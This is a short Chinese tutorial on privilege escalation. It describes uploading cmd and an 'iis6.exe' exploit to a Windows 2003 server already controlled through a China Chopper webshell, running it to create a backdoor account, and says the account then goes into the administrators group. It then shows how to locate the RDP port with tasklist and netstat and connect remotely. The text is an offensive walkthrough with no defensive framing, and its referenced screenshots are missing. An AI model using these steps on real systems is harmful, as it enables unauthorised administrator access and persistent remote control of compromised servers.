利用IIS6提权获得管理员权限

IIS6也是一个比较古老的提权EXP了，是通过利用WMI的权限来执行命令。

目标机：漏洞巨多的Win2003

下面说一下通过IIS6在已用菜刀连接上的服务器上运用IIS6获得管理员权限的过程。

1.将cmd和IIS6上传到已用菜刀控制的服务器上。

2.用cmd打开虚拟终端。

3.建立用户并添加到管理员用户组

使用上传的cmd我们就直接拥有普通权限（可以用net user、whoami等命令）

尝试输入：whoami

发现

这说明我们有权限了。

但是用net user abc 123456 /add却被拒绝访问

于是使用IIS6提权，用法：IIS6路径 "命令"

添加用户：E:\05\admin\Databackup\iis6.exe "net user abc 123456 /add"

检查一下是否成功：net user

从图上可以看出已经添加成功

下面将我们创建的用户添加到管理员用户组：

4、你就可以在各个盘之间浪了。

彩蛋（利用远程控制端口对目标机进行远程控制）（远控端口默认端口为3389，但可被修改）

进行上面操作后，用命令tasklist -svc（进程线、PID、服务名(TermService：远程桌面服务名)）

这里我们找到了远控的PID 1644，下面再用

netstat -ano

本地连接地址、目标链接地址、链接状态、PID

对应上面找到的PID可以找出端口3389（说明使用的默认端口）。

然后打开远程桌面控制

就能 连接到目标机了。